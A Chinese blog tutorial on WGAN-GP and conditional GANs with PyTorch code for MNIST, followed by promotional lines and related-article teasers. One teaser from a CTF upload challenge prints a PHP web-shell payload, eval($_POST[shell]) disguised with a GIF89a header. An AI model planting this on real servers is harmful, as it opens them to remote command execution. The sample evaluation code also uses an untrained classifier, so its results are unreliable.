Pytorch深度学习框架60天进阶学习计划 - 第41天:生成对抗网络进阶(一)
Pytorch深度学习框架60天进阶学习计划 - 第41天:生成对抗网络进阶(一)
今天我们将深入探讨生成对抗网络(GAN)的进阶内容,特别是Wasserstein GAN(WGAN)的梯度惩罚机制,以及条件生成与无监督生成在模式坍塌方面的差异。
生成对抗网络是近年来深度学习领域最激动人心的进展之一,它由Ian Goodfellow于2014年提出,通过生成器和判别器的博弈来学习生成真实数据分布的样本。随着研究的深入,GAN的改进版本层出不穷,其中WGAN及其梯度惩罚版本(WGAN-GP)解决了原始GAN训练不稳定的问题,成为了GAN研究的重要里程碑。
今天我们将从理论到实践,系统地学习这些进阶概念,并通过PyTorch实现相关模型,探索其工作原理。
1. GAN基础回顾
在深入WGAN之前,让我们简要回顾GAN的基本原理:
1.1 GAN的基本架构
GAN由两部分组成:
- 生成器(Generator): 学习从随机噪声生成看起来真实的数据
- 判别器(Discriminator): 学习区分真实数据和生成器生成的假数据
这两个网络通过对抗训练相互提高:生成器尝试生成越来越逼真的样本以欺骗判别器,而判别器则努力提高其区分真假样本的能力。
1.2 原始GAN的问题
虽然GAN的思想非常优雅,但原始GAN在训练过程中存在一些问题:
- 训练不稳定:很难找到生成器和判别器之间的平衡点
- 梯度消失:当判别器表现过好时,生成器梯度接近于零
- 模式坍塌:生成器只生成有限种类的样本,无法覆盖真实数据的全部分布
- 难以量化训练进度:缺乏有效的指标来衡量生成样本的质量
这些问题促使研究者寻找GAN的改进版本,其中WGAN是最重要的改进之一。
2. Wasserstein GAN详解
2.1 从JS散度到Wasserstein距离
原始GAN隐式地最小化生成分布与真实分布之间的Jensen-Shannon(JS)散度,这在两个分布没有显著重叠时会导致梯度问题。
Wasserstein距离(也称Earth Mover’s Distance,简称EMD)提供了一种更平滑的度量方式,即使两个分布没有重叠或重叠很少,也能提供有意义的梯度。
Wasserstein距离的直观解释:想象将一个分布的概率质量移动到另一个分布所需的最小"工作量",其中工作量定义为概率质量乘以移动距离。
2.2 WGAN的核心改进
WGAN相比原始GAN有以下关键改进:
- 目标函数改变:使用Wasserstein距离而非JS散度
- 判别器(现称为评论家/Critic)输出不再是概率:移除了最后的sigmoid激活函数
- 权重裁剪:限制评论家的参数在一定范围内,满足Lipschitz约束
- 避免使用基于动量的优化器:建议使用RMSProp或Adam优化器(学习率较小)
2.3 WGAN的目标函数
WGAN的目标函数如下:
min G max D ∈ D E x ∼ P r [ D ( x ) ] − E z ∼ P z [ D ( G ( z ) ) ] \min_G \max_{D \in \mathcal{D}} \mathbb{E}_{x \sim P_r}[D(x)] - \mathbb{E}_{z \sim P_z}[D(G(z))] GminD∈DmaxEx∼Pr[D(x)]−Ez∼Pz[D(G(z))]
其中 D \mathcal{D} D是满足1-Lipschitz约束的函数集合。
2.4 Lipschitz约束与权重裁剪
为了满足Wasserstein距离计算中的Lipschitz约束,WGAN对评论家的参数进行了权重裁剪:将权重限制在 [ − c , c ] [-c, c] [−c,c]的范围内,其中 c c c是一个小常数(如0.01)。
然而,权重裁剪是一种粗糙的方法,会导致优化问题和容量浪费。这就引出了WGAN的进一步改进:梯度惩罚机制。
3. WGAN的梯度惩罚机制
3.1 权重裁剪的局限性
WGAN中的权重裁剪虽然简单有效,但存在以下问题:
- 容量浪费:强制权重接近0或c,导致模型倾向于使用更简单的函数
- 优化困难:可能导致梯度爆炸或消失
- 对架构敏感:不同网络架构可能需要不同的裁剪范围
3.2 梯度惩罚的原理
WGAN-GP(带梯度惩罚的WGAN)提出了一种更优雅的方式来满足Lipschitz约束。其核心思想是:
对于一个1-Lipschitz函数,其梯度范数在任何地方都不应超过1。因此,我们可以通过惩罚评论家函数梯度范数偏离1的行为来满足这一约束。
具体来说,WGAN-GP在真实数据和生成数据之间的随机插值点上施加梯度惩罚:
L G P = E x ^ ∼ P x ^ [ ( ∣ ∣ ∇ x ^ D ( x ^ ) ∣ ∣ 2 − 1 ) 2 ] \mathcal{L}_{GP} = \mathbb{E}_{\hat{x} \sim P_{\hat{x}}}[(||\nabla_{\hat{x}}D(\hat{x})||_2 - 1)^2] LGP=Ex^∼Px^[(∣∣∇x^D(x^)∣∣2−1)2]
其中 x ^ \hat{x} x^是在真实样本 x x x和生成样本 G ( z ) G(z) G(z)之间的随机插值:
x ^ = ϵ x + ( 1 − ϵ ) G ( z ) \hat{x} = \epsilon x + (1-\epsilon)G(z) x^=ϵx+(1−ϵ)G(z)
ϵ \epsilon ϵ是一个在 [ 0 , 1 ] [0,1] [0,1]之间均匀采样的随机数。
3.3 WGAN-GP的完整目标函数
将梯度惩罚添加到WGAN的目标函数中,我们得到WGAN-GP的目标函数:
L = E z ∼ p ( z ) [ D ( G ( z ) ) ] − E x ∼ p d a t a [ D ( x ) ] + λ E x ^ ∼ P x ^ [ ( ∣ ∣ ∇ x ^ D ( x ^ ) ∣ ∣ 2 − 1 ) 2 ] \mathcal{L} = \mathbb{E}_{z \sim p(z)}[D(G(z))] - \mathbb{E}_{x \sim p_{data}}[D(x)] + \lambda \mathbb{E}_{\hat{x} \sim P_{\hat{x}}}[(||\nabla_{\hat{x}}D(\hat{x})||_2 - 1)^2] L=Ez∼p(z)[D(G(z))]−Ex∼pdata[D(x)]+λEx^∼Px^[(∣∣∇x^D(x^)∣∣2−1)2]
其中 λ \lambda λ是梯度惩罚的权重,通常设为10。
3.4 WGAN-GP的优势
WGAN-GP相比WGAN有以下优势:
- 更好的稳定性:避免了权重裁剪带来的问题
- 更快的收敛:通常需要更少的迭代次数
- 更好的生成质量:能生成更多样、更高质量的样本
- 架构灵活性:适用于各种GAN架构,包括深度卷积网络
4. PyTorch实现WGAN-GP
下面我们使用PyTorch实现一个简单的WGAN-GP模型,用于生成MNIST手写数字。
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import numpy as np
import matplotlib.pyplot as plt# 设置随机种子,确保结果可复现
torch.manual_seed(42)
np.random.seed(42)# 设置设备
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Using device: {device}")# 超参数
batch_size = 64
lr = 0.0002
n_epochs = 50
latent_dim = 100
img_shape = (1, 28, 28)
lambda_gp = 10 # 梯度惩罚权重# 数据加载
transform = transforms.Compose([transforms.ToTensor(),transforms.Normalize([0.5], [0.5]) # 归一化到[-1, 1]
])mnist_dataset = torchvision.datasets.MNIST(root='./data',train=True,transform=transform,download=True
)dataloader = DataLoader(mnist_dataset,batch_size=batch_size,shuffle=True,num_workers=2
)# 生成器网络
class Generator(nn.Module):def __init__(self):super(Generator, self).__init__()def block(in_features, out_features, normalize=True):layers = [nn.Linear(in_features, out_features)]if normalize:layers.append(nn.BatchNorm1d(out_features, 0.8))layers.append(nn.LeakyReLU(0.2, inplace=True))return layersself.model = nn.Sequential(*block(latent_dim, 128, normalize=False),*block(128, 256),*block(256, 512),*block(512, 1024),nn.Linear(1024, int(np.prod(img_shape))),nn.Tanh() # 输出归一化到[-1, 1])def forward(self, z):img = self.model(z)img = img.view(img.size(0), *img_shape)return img# 判别器网络(评论家)
class Discriminator(nn.Module):def __init__(self):super(Discriminator, self).__init__()self.model = nn.Sequential(nn.Linear(int(np.prod(img_shape)), 512),nn.LeakyReLU(0.2, inplace=True),nn.Linear(512, 256),nn.LeakyReLU(0.2, inplace=True),nn.Linear(256, 1)# 注意:没有sigmoid激活函数)def forward(self, img):img_flat = img.view(img.size(0), -1)validity = self.model(img_flat)return validity# 初始化网络
generator = Generator().to(device)
discriminator = Discriminator().to(device)# 初始化优化器
optimizer_G = optim.Adam(generator.parameters(), lr=lr, betas=(0.5, 0.9))
optimizer_D = optim.Adam(discriminator.parameters(), lr=lr, betas=(0.5, 0.9))# 计算梯度惩罚
def compute_gradient_penalty(D, real_samples, fake_samples):"""计算WGAN-GP中的梯度惩罚"""# 在真实样本和生成样本之间随机插值alpha = torch.rand(real_samples.size(0), 1, 1, 1, device=device)interpolates = (alpha * real_samples + (1 - alpha) * fake_samples).requires_grad_(True)# 计算插值点的判别器输出d_interpolates = D(interpolates)# 计算梯度fake = torch.ones(d_interpolates.size(), device=device, requires_grad=False)gradients = torch.autograd.grad(outputs=d_interpolates,inputs=interpolates,grad_outputs=fake,create_graph=True,retain_graph=True,only_inputs=True)[0]# 计算梯度范数gradients = gradients.view(gradients.size(0), -1)gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()return gradient_penalty# 训练函数
def train_wgan_gp():# 用于记录损失d_losses = []g_losses = []for epoch in range(n_epochs):for i, (real_imgs, _) in enumerate(dataloader):real_imgs = real_imgs.to(device)batch_size = real_imgs.shape[0]# ---------------------# 训练判别器# ---------------------optimizer_D.zero_grad()# 生成随机噪声z = torch.randn(batch_size, latent_dim, device=device)# 生成一批假图像fake_imgs = generator(z)# 判别器前向传播real_validity = discriminator(real_imgs)fake_validity = discriminator(fake_imgs.detach())# 计算梯度惩罚gradient_penalty = compute_gradient_penalty(discriminator, real_imgs.data, fake_imgs.data)# WGAN-GP 判别器损失d_loss = -torch.mean(real_validity) + torch.mean(fake_validity) + lambda_gp * gradient_penaltyd_loss.backward()optimizer_D.step()# 每n_critic次迭代训练一次生成器n_critic = 5if i % n_critic == 0:# ---------------------# 训练生成器# ---------------------optimizer_G.zero_grad()# 生成一批新的假图像gen_imgs = generator(z)# 判别器评估假图像fake_validity = discriminator(gen_imgs)# WGAN 生成器损失g_loss = -torch.mean(fake_validity)g_loss.backward()optimizer_G.step()if i % 50 == 0:print(f"[Epoch {epoch}/{n_epochs}] [Batch {i}/{len(dataloader)}] "f"[D loss: {d_loss.item():.4f}] [G loss: {g_loss.item():.4f}]")d_losses.append(d_loss.item())g_losses.append(g_loss.item())# 每个epoch结束后保存生成的图像样本if (epoch + 1) % 10 == 0:save_sample_images(epoch)# 绘制损失曲线plt.figure(figsize=(10, 5))plt.plot(d_losses, label='Discriminator Loss')plt.plot(g_losses, label='Generator Loss')plt.xlabel('Iterations (x50)')plt.ylabel('Loss')plt.legend()plt.savefig('wgan_gp_loss.png')plt.close()# 保存样本图像
def save_sample_images(epoch):# 生成并保存样本图像z = torch.randn(25, latent_dim, device=device)gen_imgs = generator(z).detach().cpu()# 将图像像素值从[-1, 1]转换为[0, 1]gen_imgs = 0.5 * gen_imgs + 0.5# 创建图像网格fig, axs = plt.subplots(5, 5, figsize=(10, 10))for i in range(5):for j in range(5):axs[i, j].imshow(gen_imgs[i*5+j, 0, :, :], cmap='gray')axs[i, j].axis('off')# 保存图像plt.savefig(f'wgan_gp_epoch_{epoch+1}.png')plt.close()# 运行训练
if __name__ == "__main__":train_wgan_gp()
这段代码实现了一个基本的WGAN-GP模型,用于生成MNIST数字图像。下面我们来解析代码的关键部分:
- 梯度惩罚计算:
compute_gradient_penalty
函数实现了WGAN-GP的核心——在真实样本和生成样本之间的插值点上计算梯度惩罚。 - 判别器损失:包括真实数据的评论家值、生成数据的评论家值,以及梯度惩罚项。
- 生成器损失:仅包含生成数据的评论家值的负期望。
- 优化器设置:使用Adam优化器,但β1参数设为0.5,这是GAN训练的常见设置。
- 训练循环:判别器和生成器交替训练,但判别器通常训练多次(n_critic=5)后才训练一次生成器。
5. WGAN-GP训练流程图
以下是WGAN-GP的训练流程图,帮助理解整个训练过程:
┌────────────────────┐
│ 初始化网络和优化器 │
└──────────┬─────────┘│▼
┌────────────────────┐
│ 开始训练循环 │
└──────────┬─────────┘│▼
┌────────────────────┐
│ 从数据集加载真实样本 │
└──────────┬─────────┘│▼
┌────────────────────┐
│ 生成随机噪声并产生 │
│ 假样本 │
└──────────┬─────────┘│▼
┌────────────────────┐
│ 计算判别器对真实 │
│ 和假样本的输出 │
└──────────┬─────────┘│▼
┌────────────────────┐
│ 在样本插值点上计算 │
│ 梯度惩罚 │
└──────────┬─────────┘│▼
┌────────────────────┐
│ 计算判别器损失 │
│ 并更新判别器参数 │
└──────────┬─────────┘│▼┌────┴─────┐│ i % n_critic ││ == 0? │└────┬─────┘No │ Yes┌─────────┘ └──────────┐│ ▼│ ┌────────────────────┐│ │ 重新生成假样本 ││ └──────────┬─────────┘│ ││ ▼│ ┌────────────────────┐│ │ 计算生成器损失 ││ │ 并更新生成器参数 ││ └──────────┬─────────┘│ │└─────────────────────────┘│▼
┌────────────────────┐
│ 是否达到预定训练轮数? │
└──────────┬─────────┘No │ Yes┌────┘ └──────────┐│ ▼│ ┌────────────────────┐└──────▶ │ 结束训练 │└────────────────────┘
这个流程图展示了WGAN-GP的训练过程,包括梯度惩罚的计算和判别器多次训练的机制。与普通GAN相比,WGAN-GP的关键区别在于梯度惩罚的引入和目标函数的改变。
6. 条件生成与无监督生成的对比
接下来,我们将探讨条件生成与无监督生成在模式坍塌方面的差异。
6.1 无监督生成与模式坍塌
无监督生成是指生成器仅从随机噪声生成样本,没有额外的条件输入。
模式坍塌(Mode Collapse)是GAN训练中的常见问题,指生成器只学会生成数据分布中的少数几种模式,而忽略了其他模式。例如,在MNIST数据集上,模型可能只生成数字"1"而不生成其他数字。
导致模式坍塌的原因:
- 判别器更新不足:判别器无法有效区分真假样本
- 梯度消失:当判别器表现过好时,生成器梯度接近零
- 目标函数设计问题:JS散度在两个分布不重叠时提供有限的梯度信息
6.2 条件生成对模式坍塌的缓解
条件生成是指生成器不仅接收随机噪声,还接收额外的条件信息(如类别标签)作为输入。
条件GAN(CGAN)通过以下方式缓解模式坍塌:
- 强制生成器覆盖所有类别:通过提供不同的类别条件,迫使生成器学习生成不同类别的样本
- 简化学习任务:条件信息使生成器只需要学习条件分布,而非整个联合分布
- 提供更多监督信号:条件信息为生成器提供了额外的指导
6.3 条件生成与无监督生成的模式坍塌差异表
特性 | 无监督生成 | 条件生成 |
---|---|---|
输入 | 仅随机噪声 | 随机噪声 + 条件信息 |
模式覆盖 | 容易忽略部分模式 | 被条件强制覆盖更多模式 |
生成样本多样性 | 较低,倾向于生成相似样本 | 较高,不同条件生成不同样本 |
训练稳定性 | 较差,易发生模式坍塌 | 较好,条件信息提供稳定指导 |
应用灵活性 | 生成过程不可控 | 可控制生成特定类别/属性的样本 |
实现复杂度 | 相对简单 | 需要额外的条件嵌入机制 |
7. 实现条件WGAN-GP
下面我们将实现一个条件版本的WGAN-GP,以比较其与无监督版本在模式坍塌方面的差异。
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import numpy as np
import matplotlib.pyplot as plt# 设置随机种子
torch.manual_seed(42)
np.random.seed(42)# 设置设备
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Using device: {device}")# 超参数
batch_size = 64
lr = 0.0002
n_epochs = 50
latent_dim = 100
img_shape = (1, 28, 28)
n_classes = 10 # MNIST有10个类别
lambda_gp = 10 # 梯度惩罚权重# 数据加载
transform = transforms.Compose([transforms.ToTensor(),transforms.Normalize([0.5], [0.5]) # 归一化到[-1, 1]
])mnist_dataset = torchvision.datasets.MNIST(root='./data',train=True,transform=transform,download=True
)dataloader = DataLoader(mnist_dataset,batch_size=batch_size,shuffle=True,num_workers=2
)# 条件生成器网络
class ConditionalGenerator(nn.Module):def __init__(self):super(ConditionalGenerator, self).__init__()# 嵌入层将类别标签转换为嵌入向量self.label_embedding = nn.Embedding(n_classes, n_classes)# 输入层处理噪声和类别嵌入self.input_layer = nn.Linear(latent_dim + n_classes, 128)# 主要模型self.model = nn.Sequential(nn.BatchNorm1d(128, 0.8),nn.LeakyReLU(0.2, inplace=True),nn.Linear(128, 256),nn.BatchNorm1d(256, 0.8),nn.LeakyReLU(0.2, inplace=True),nn.Linear(256, 512),nn.BatchNorm1d(512, 0.8),nn.LeakyReLU(0.2, inplace=True),nn.Linear(512, 1024),nn.BatchNorm1d(1024, 0.8),nn.LeakyReLU(0.2, inplace=True),nn.Linear(1024, int(np.prod(img_shape))),nn.Tanh())def forward(self, noise, labels):# 将标签嵌入向量与噪声拼接label_embedding = self.label_embedding(labels)x = torch.cat([noise, label_embedding], dim=1)# 通过输入层x = self.input_layer(x)# 通过主模型x = self.model(x)# 重塑为图像格式img = x.view(x.size(0), *img_shape)return img# 条件判别器网络
class ConditionalDiscriminator(nn.Module):def __init__(self):super(ConditionalDiscriminator, self).__init__()# 嵌入层将类别标签转换为嵌入向量self.label_embedding = nn.Embedding(n_classes, n_classes)# 处理图像和标签self.model = nn.Sequential(nn.Linear(int(np.prod(img_shape)) + n_classes, 512),nn.LeakyReLU(0.2, inplace=True),nn.Linear(512, 256),nn.LeakyReLU(0.2, inplace=True),nn.Linear(256, 1))def forward(self, img, labels):# 将图像展平img_flat = img.view(img.size(0), -1)# 获取标签嵌入label_embedding = self.label_embedding(labels)# 拼接图像特征和标签嵌入x = torch.cat([img_flat, label_embedding], dim=1)# 通过判别器网络validity = self.model(x)return validity# 初始化网络
generator = ConditionalGenerator().to(device)
discriminator = ConditionalDiscriminator().to(device)# 初始化优化器
optimizer_G = optim.Adam(generator.parameters(), lr=lr, betas=(0.5, 0.9))
optimizer_D = optim.Adam(discriminator.parameters(), lr=lr, betas=(0.5, 0.9))# 计算梯度惩罚(条件版本)
def compute_gradient_penalty(D, real_samples, fake_samples, labels):"""计算条件WGAN-GP的梯度惩罚"""# 在真实样本和生成样本之间随机插值alpha = torch.rand(real_samples.size(0), 1, 1, 1, device=device)interpolates = (alpha * real_samples + (1 - alpha) * fake_samples).requires_grad_(True)# 计算插值点的判别器输出(带条件)d_interpolates = D(interpolates, labels)# 计算梯度fake = torch.ones(d_interpolates.size(), device=device, requires_grad=False)gradients = torch.autograd.grad(outputs=d_interpolates,inputs=interpolates,grad_outputs=fake,create_graph=True,retain_graph=True,only_inputs=True)[0]# 计算梯度范数gradients = gradients.view(gradients.size(0), -1)gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()return gradient_penalty# 训练条件WGAN-GP
def train_conditional_wgan_gp():# 用于记录损失d_losses = []g_losses = []# 用于记录生成样本的多样性(通过类别分布)class_distributions = []for epoch in range(n_epochs):for i, (real_imgs, labels) in enumerate(dataloader):real_imgs = real_imgs.to(device)labels = labels.to(device)batch_size = real_imgs.shape[0]# ---------------------# 训练判别器# ---------------------optimizer_D.zero_grad()# 生成随机噪声z = torch.randn(batch_size, latent_dim, device=device)# 为生成器生成随机标签gen_labels = torch.randint(0, n_classes, (batch_size,), device=device)# 生成一批假图像fake_imgs = generator(z, gen_labels)# 判别器前向传播real_validity = discriminator(real_imgs, labels)fake_validity = discriminator(fake_imgs.detach(), gen_labels)# 计算梯度惩罚gradient_penalty = compute_gradient_penalty(discriminator, real_imgs.data, fake_imgs.data, labels)# WGAN-GP 判别器损失d_loss = -torch.mean(real_validity) + torch.mean(fake_validity) + lambda_gp * gradient_penaltyd_loss.backward()optimizer_D.step()# 每n_critic次迭代训练一次生成器n_critic = 5if i % n_critic == 0:# ---------------------# 训练生成器# ---------------------optimizer_G.zero_grad()# 为生成器生成新的随机标签gen_labels = torch.randint(0, n_classes, (batch_size,), device=device)# 生成一批新的假图像gen_imgs = generator(z, gen_labels)# 判别器评估假图像fake_validity = discriminator(gen_imgs, gen_labels)# WGAN 生成器损失g_loss = -torch.mean(fake_validity)g_loss.backward()optimizer_G.step()if i % 50 == 0:print(f"[Epoch {epoch}/{n_epochs}] [Batch {i}/{len(dataloader)}] "f"[D loss: {d_loss.item():.4f}] [G loss: {g_loss.item():.4f}]")d_losses.append(d_loss.item())g_losses.append(g_loss.item())# 每个epoch结束后,评估生成样本的类别分布if (epoch + 1) % 10 == 0:class_dist = evaluate_class_distribution()class_distributions.append(class_dist)# 保存生成的图像样本save_sample_images(epoch)# 绘制损失曲线plt.figure(figsize=(10, 5))plt.plot(d_losses, label='Discriminator Loss')plt.plot(g_losses, label='Generator Loss')plt.xlabel('Iterations (x50)')plt.ylabel('Loss')plt.legend()plt.savefig('cond_wgan_gp_loss.png')plt.close()# 绘制类别分布变化plot_class_distributions(class_distributions)# 评估生成样本的类别分布
def evaluate_class_distribution():"""评估生成样本在各类别上的分布情况"""# 创建一个预训练的分类器classifier = torchvision.models.resnet18(pretrained=True)# 修改第一个卷积层以适应灰度图classifier.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)# 修改最后的全连接层以适应MNIST的10个类别classifier.fc = nn.Linear(classifier.fc.in_features, 10)# 加载预先训练好的MNIST分类器权重(这里假设我们有一个预训练的模型)# classifier.load_state_dict(torch.load('mnist_classifier.pth'))# 简化起见,这里我们使用一个简单的CNN分类器classifier = nn.Sequential(nn.Conv2d(1, 32, kernel_size=3, stride=1, padding=1),nn.ReLU(),nn.MaxPool2d(kernel_size=2, stride=2),nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1),nn.ReLU(),nn.MaxPool2d(kernel_size=2, stride=2),nn.Flatten(),nn.Linear(64 * 7 * 7, 128),nn.ReLU(),nn.Linear(128, 10)).to(device)# 这里假设这个简单分类器已经在MNIST上训练好了# 实际应用中,应该加载一个预先训练好的模型# 生成1000个样本z = torch.randn(1000, latent_dim, device=device)# 均匀采样所有类别gen_labels = torch.tensor([i % 10 for i in range(1000)], device=device)gen_imgs = generator(z, gen_labels)# 使用分类器预测类别with torch.no_grad():classifier.eval()preds = torch.softmax(classifier(gen_imgs), dim=1)pred_labels = torch.argmax(preds, dim=1)# 计算每个类别的样本数量class_counts = torch.zeros(10)for i in range(10):class_counts[i] = (pred_labels == i).sum().item() / 1000return class_counts.numpy()# 绘制类别分布变化
def plot_class_distributions(class_distributions):"""绘制生成样本类别分布的变化"""epochs = [10, 20, 30, 40, 50] # 假设每10个epoch评估一次plt.figure(figsize=(12, 8))for i, dist in enumerate(class_distributions):plt.subplot(len(class_distributions), 1, i+1)plt.bar(np.arange(10), dist)plt.ylabel(f'Epoch {epochs[i]}')plt.ylim(0, 0.3) # 限制y轴范围,便于比较if i == len(class_distributions) - 1:plt.xlabel('Digit Class')plt.tight_layout()plt.savefig('class_distribution.png')plt.close()# 保存样本图像(条件版本)
def save_sample_images(epoch):"""保存按类别排列的样本图像"""# 为每个类别生成样本n_row = 10 # 每个类别一行n_col = 10 # 每个类别10个样本fig, axs = plt.subplots(n_row, n_col, figsize=(12, 12))for i in range(n_row):# 固定类别fixed_class = torch.tensor([i] * n_col, device=device)# 随机噪声z = torch.randn(n_col, latent_dim, device=device)# 生成图像gen_imgs = generator(z, fixed_class).detach().cpu()# 转换到[0, 1]范围gen_imgs = 0.5 * gen_imgs + 0.5# 显示图像for j in range(n_col):axs[i, j].imshow(gen_imgs[j, 0, :, :], cmap='gray')axs[i, j].axis('off')plt.savefig(f'cond_wgan_gp_epoch_{epoch+1}.png')plt.close()# 运行条件WGAN-GP训练
if __name__ == "__main__":train_conditional_wgan_gp()
清华大学全五版的《DeepSeek教程》完整的文档需要的朋友,关注我私信:deepseek 即可获得。
怎么样今天的内容还满意吗?再次感谢朋友们的观看,关注GZH:凡人的AI工具箱,回复666,送您价值199的AI大礼包。最后,祝您早日实现财务自由,还请给个赞,谢谢!
相关文章:
Pytorch深度学习框架60天进阶学习计划 - 第41天:生成对抗网络进阶(一)
Pytorch深度学习框架60天进阶学习计划 - 第41天:生成对抗网络进阶(一) 今天我们将深入探讨生成对抗网络(GAN)的进阶内容,特别是Wasserstein GAN(WGAN)的梯度惩罚机制,以及条件生成与无监督生成…...
62. 不同路径
前言 本篇文章来自leedcode,是博主的学习算法的笔记心得。 如果觉得对你有帮助,可以点点关注,点点赞,谢谢你! 题目链接 62. 不同路径 - 力扣(LeetCode) 题目描述 思路 1.如果m1或者n1就只…...
使用Apache POI实现Java操作Office文件:从Excel、Word到PPT模板写入
在企业级开发中,自动化处理Office文件(如Excel报表生成、Word文档模板填充、PPT批量制作)是常见需求。Apache POI作为Java领域最成熟的Office文件操作库,提供了一套完整的解决方案。本文将通过实战代码,详细讲解如何使…...
基于 RabbitMQ 优先级队列的订阅推送服务详细设计方案
基于 RabbitMQ 优先级队列的订阅推送服务详细设计方案 一、架构设计 分层架构: 订阅管理层(Spring Boot)消息分发层(RabbitMQ Cluster)推送执行层(Spring Cloud Stream)数据存储层(Redis + MySQL)核心组件: +-------------------+ +-------------------+ …...
设计模式(8)——SOLID原则之依赖倒置原则
设计模式(7)——SOLID原则之依赖倒置原则 概念使用示例 概念 高层次的类不应该依赖于低层次的类。两者都应该依赖于抽象接口。抽象接口不应依赖于具体实现。具体实现应该依赖于抽象接口。 底层次类:实现基础操作的类(如磁盘操作…...
oracle COUNT(1) 和 COUNT(*)
在 Oracle 数据库中,COUNT(1) 和 COUNT(*) 都用于统计表中的行数,但它们的语义和性能表现存在一些细微区别。 1. 语义区别 COUNT(*) 统计表中所有行的数量,包括所有列值为 NULL 的行。它直接针对表的行进行计数,不关心具体列的值…...
理想汽车MindVLA自动驾驶架构核心技术梳理
理想汽车于2025年3月发布的MindVLA自动驾驶架构,通过整合视觉、语言与行为智能,重新定义了自动驾驶系统的技术范式。以下是其核心技术实现的详细梳理: 一、架构设计:三位一体的智能融合 VLA统一模型架构 MindVLA并非简单的端到端模…...
基于FPGA的智能垃圾桶设计-超声波测距模块-人体感应模块-舵机模块 仿真通过
基于FPGA的智能垃圾桶设计 前言一、整体方案二、仿真波形总结 前言 在FPGA开发平台中搭建完整的硬件控制系统,集成超声波测距模块、人体感应电路、舵机驱动模块及报警单元。在感知层配置阶段,优化超声波回波信号调理电路与人体感应防误触逻辑࿰…...
[极客大挑战 2019]Upload
<script language"php">eval($_POST[shell]);</script> <script language"php">#这里写PHP代码哟! </script> BM <script language"php">eval($_POST[shell]);</script>GIF89a <…...
操作系统基础:05 系统调用实现
一、系统调用概述 上节课讲解了系统调用的概念,系统调用是操作系统给上层应用提供的接口,表现为一些函数,如open、read、write 等。上层应用程序通过调用这些函数进入操作系统,使用操作系统功能,就像插座一样…...
“堆积木”式话云原生微服务架构(第一回)
模块1:文章目录 目录 1. 云原生架构核心概念 2. Java微服务技术选型 3. Kubernetes与服务网格实战 4. 全链路监控与日志体系 5. 安全防护与性能优化 6. 行业案例与未来演进 7. 学习路径与资源指引 8. 下期预告与扩展阅读 模块2:云原生架构核心概念 核…...
Java 性能优化:从原理到实践的全面指南
性能优化是 Java 开发中不可或缺的一环,尤其在高并发、大数据和分布式系统场景下,优化直接影响系统响应速度、资源利用率和用户体验。Java 作为一门成熟的语言,提供了丰富的工具和机制支持性能调优,但优化需要深入理解 JVM、并发模…...
基于ssm网络游戏推荐系统(源码+lw+部署文档+讲解),源码可白嫖!
摘要 当今社会进入了科技进步、经济社会快速发展的新时代。国际信息和学术交流也不断加强,计算机技术对经济社会发展和人民生活改善的影响也日益突出,人类的生存和思考方式也产生了变化。传统网络游戏管理采取了人工的管理方法,但这种管理方…...
HTTP:五.WEB服务器
web服务器 定义:实现提供资源或应答的提供者都可以谓之为服务器!web服务器工作内容 接受建立连接请求 接受请求 处理请求 访问报文中指定的资源 构建响应 发送响应 记录事务处理过程 Web应用开发用到的一般技术元素 静态元素:html, img,js,Css,SWF,MP4 动态元素:PHP,…...
synchronized轻量级锁的自旋之谜:Java为何在临界区“空转“等待?
从餐厅等位理解自旋锁的智慧 想象两家不同的餐厅: 传统餐厅:没座位时顾客去逛街(线程挂起,上下文切换)网红餐厅:没座位时顾客在门口短时间徘徊(线程自旋,避免切换) Ja…...
基于redis 实现我的收藏功能优化详细设计方案
基于redis 实现我的收藏功能优化详细设计方案 一、架构设计 +---------------------+ +---------------------+ | 客户端请求 | | 数据存储层 | | (收藏列表查询) | | (Redis Cluster) | +-------------------…...
【深度学习与大模型基础】第10章-期望、方差和协方差
一、期望 ——————————————————————————————————————————— 1. 期望是什么? 期望(Expectation)可以理解为“长期的平均值”。比如: 掷骰子:一个6面骰子的点数是1~6&#x…...
JavaScript 性能优化实战:深入探讨 JavaScript 性能瓶颈,分享优化技巧与最佳实践
在当今 Web 应用日益复杂的时代,JavaScript 性能对于用户体验起着决定性作用。缓慢的脚本执行会导致页面加载延迟、交互卡顿,严重影响用户留存率。本文将深入剖析 JavaScript 性能瓶颈,并分享一系列实用的优化技巧与最佳实践,助你…...
上篇:《排序算法的奇妙世界:如何让数据井然有序?》
个人主页:strive-debug 排序算法精讲:从理论到实践 一、排序概念及应用 1.1 基本概念 **排序**:将一组记录按照特定关键字(如数值大小)进行递增或递减排列的操作。 1.2 常见排序算法分类 - **简单低效型**ÿ…...
目前状况下,计算机和人工智能是什么关系?
目录 一、计算机和人工智能的关系 (一)从学科发展角度看 计算机是基础 人工智能是计算机的延伸和拓展 (二)从技术应用角度看 二、计算机系学生对人工智能的了解程度 (一)基础层面的了解 必备知识 …...
【复旦微FM33 MCU 底层开发指南】高级定时器ATIM
0 前言 本系列基于复旦微FM33LC0系列MCU的DataSheet编写,提供基于寄存器开发指南、应用技巧、注意事项等 本文章及本系列其他文章将持续更新,本系列其它文章请跳转↓↓↓ 【复旦微FM33 MCU 寄存器开发指南】总集篇 本文章最后更新日期:2025…...
vdso概念及原理,vdso_fault缺页异常,vdso符号的获取
一、背景 vdso的全称是Virtual Dynamic Shared Object,它是一个特殊的共享库,是在编译内核时生成,并在内核镜像里某一段地址段作为该共享库的内容。vdso的前身是vsyscall,为了兼容一些旧的程序,x86上还是默认加载了vs…...
4.13学习总结
学习完异常和文件的基本知识 完成45. 跳跃游戏 II - 力扣(LeetCode)的算法题,对于我来说,用贪心的思路去写该题是很难理解的,很难想到,理解了许久,也卡了很久。...
Day14:关于MySQL的索引——创、查、删
前言:先创建一个练习的数据库和数据 1.创建数据库并创建数据表的基本结构 -- 创建练习数据库 CREATE DATABASE index_practice; USE index_practice;-- 创建基础表(包含CREATE TABLE时创建索引) CREATE TABLE products (id INT PRIMARY KEY…...
